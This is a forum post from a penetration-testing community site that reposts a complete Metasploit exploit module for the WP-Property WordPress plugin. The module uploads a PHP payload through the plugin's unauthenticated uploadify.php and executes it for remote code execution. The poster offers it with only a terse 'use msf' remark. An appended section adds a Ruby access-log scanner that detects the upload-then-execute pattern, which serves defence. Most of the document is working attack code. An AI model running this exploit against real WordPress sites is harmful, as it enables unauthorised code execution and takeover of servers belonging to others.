中国网络渗透测试联盟

Title: WordPress WP-Property PHP File Upload Vulnerability

Author: admin    Time: 2013-1-4 19:51
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end
Don't ask me what this code is or how to use it; all I'll say is: msf.
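For defenders running WP-Property 1.35.0 or earlier, the module's two-step pattern (a POST to uploadify.php, then a request for a new .php file) is visible in web server access logs. The following is an added example, not part of the original post or of Metasploit: the function name `uploadify_findings`, the combined log format and the constructed sample lines are all assumptions.

```ruby
# Added example: flag WP-Property uploadify upload-then-execute sequences
# in an access log. Assumes Apache/nginx combined log format.
UPLOADIFY_DIR = 'wp-content/plugins/wp-property/third-party/uploadify/'.freeze
LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/

# Constructed sample data (documentation IP ranges), not real traffic.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [04/Jan/2013:19:40:01 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0
  203.0.113.7 - - [04/Jan/2013:19:40:02 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 74
  203.0.113.7 - - [04/Jan/2013:19:40:03 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/AbCdE.php HTTP/1.1" 200 0
  198.51.100.9 - - [04/Jan/2013:19:41:10 +0800] "GET /wordpress/index.php HTTP/1.1" 200 5120
  198.51.100.9 - - [04/Jan/2013:19:41:12 +0800] "POST /wordpress/wp-login.php HTTP/1.1" 302 0
LOG

# Returns an array of findings, one hash per suspicious request:
#   :upload_post      - any POST to uploadify.php (unauthenticated upload endpoint)
#   :upload_then_exec - a .php file in the uploadify directory requested by a
#                       client that previously POSTed to uploadify.php
#   :unexpected_php   - a .php file other than uploadify.php requested there
#                       by any other client
def uploadify_findings(log_text)
  uploaders = {} # client IP => timestamp of its first upload POST
  findings = []
  log_text.each_line do |line|
    m = LOG_LINE.match(line) or next
    path = m[:path].split('?', 2).first
    idx = path.index(UPLOADIFY_DIR) or next
    file = path[(idx + UPLOADIFY_DIR.length)..-1]
    if m[:method] == 'POST' && file == 'uploadify.php'
      uploaders[m[:ip]] ||= m[:ts]
      findings << { type: :upload_post, ip: m[:ip], ts: m[:ts], path: path }
    elsif file =~ /\.php\z/i && file != 'uploadify.php'
      type = uploaders.key?(m[:ip]) ? :upload_then_exec : :unexpected_php
      findings << { type: type, ip: m[:ip], ts: m[:ts], path: path }
    end
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  uploadify_findings(SAMPLE_LOG).each do |f|
    puts format('%-16s %-15s %s %s', f[:type], f[:ip], f[:ts], f[:path])
  end
end
```

Because the destination directory is taken from the request's `folder` form field, the POST to uploadify.php is the more reliable indicator; treat any hit as a reason to check the plugin version and remove or block the bundled uploadify.php.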